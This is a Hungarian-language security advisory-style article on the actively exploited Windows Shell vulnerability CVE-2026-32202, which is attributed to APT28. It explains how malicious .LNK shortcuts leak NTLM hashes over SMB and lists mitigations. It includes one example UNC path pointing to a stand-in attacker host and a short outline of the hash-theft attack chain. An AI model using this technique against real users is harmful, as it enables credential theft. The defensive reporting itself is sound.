A Microsoft megerősítette, hogy egy korábban javított Windows hiba valós támadásokban is kihasználásra került, ami komoly aggályokat vet fel a javítások hatékonyságával kapcsolatban.
👉 Az érintett sérülékenység: CVE-2026-32202
Mi a probléma?
A hiba a Windows Shell komponensben található, és:
👉 védelmi mechanizmus hibájából ered
Lehetővé teszi:
- spoofing támadást (megszemélyesítés)
- érzékeny adatok részleges megszerzését
Fontos:
- nem teszi lehetővé a rendszer teljes átvételét önmagában
- de támadási lánc részeként nagyon veszélyes
Miért különösen veszélyes?
Bár a CVSS pontszám csak 4.3 (közepes):
👉 aktív támadásokban használják
Ez azt jelenti:
a valós kockázat jóval magasabb
Hogyan működik a támadás?
A támadók:
👉 rosszindulatú .LNK (Windows shortcut) fájlokat használnak
Amikor a felhasználó megnyitja:
- a rendszer megpróbál kapcsolatot létesíteni egy külső szerverrel
- SMB kapcsolat indul
- NTLM hitelesítés történik
👉 eredmény:
- a felhasználó hitelesítési hash-e kiszivárog
Mi az a kritikus pont?
A hiba kulcsa:
👉 UNC útvonal feldolgozás
Példa:
\\attacker.com\share\file👉 a Windows automatikusan kapcsolódik
Felhasználói tudatosság nélkül.
Mit szerez meg a támadó?
- Net-NTLMv2 hash
- hitelesítési adatok lenyomata
Ez felhasználható:
- jelszó feltörésre
- relay támadásra
- további belépésekhez
Kapcsolat más sérülékenységekkel
A kutatók szerint:
👉 ez egy nem teljesen javított korábbi hiba
Kapcsolódó CVE-k:
- CVE-2026-21510
- CVE-2026-21513
👉 ezek súlyosabbak (CVSS 8.8)
Kik használják?
A támadásokhoz köthető:
👉 APT28
Más néven:
- Fancy Bear
- Forest Blizzard
👉 állami hátterű kiberkémkedés
Támadási lánc
A folyamat:
- felhasználó megnyit egy fájlt
- kapcsolat támadó szerverhez
- hitelesítési adat kiszivárgás
- további támadás (laterális mozgás)
👉 ez gyakran több lépcsős támadás része
Mi volt a probléma a javítással?
A Microsoft:
- korábban javította a hibát
- de nem teljesen
👉 a hitelesítési folyamat része nyitva maradt
Ez vezetett az új CVE-hez.
Mit kell tenni?
🔴 Kritikus lépések:
- minden frissítés azonnali telepítése
- Patch Tuesday javítások ellenőrzése
🟡 Védelem:
- SMB forgalom monitorozása
- külső kapcsolatok szűrése
- NTLM használat korlátozása
🟢 Haladó védelem:
- credential guard
- hálózati szegmentáció
- LNK fájlok szűrése
Nagyobb tanulság
Ez az eset megmutatja:
👉 az alacsony CVSS nem jelent alacsony kockázatot
👉 a támadók képesek hibákat láncolni
👉 részleges javítás = új támadási felület
Összegzés
A CVE-2026-32202:
- aktívan kihasznált sérülékenység
- hitelesítési adatokat szivárogtat
- állami támadásokhoz köthető
👉 a legfontosabb:
frissítés + hálózati védelem + tudatosság.





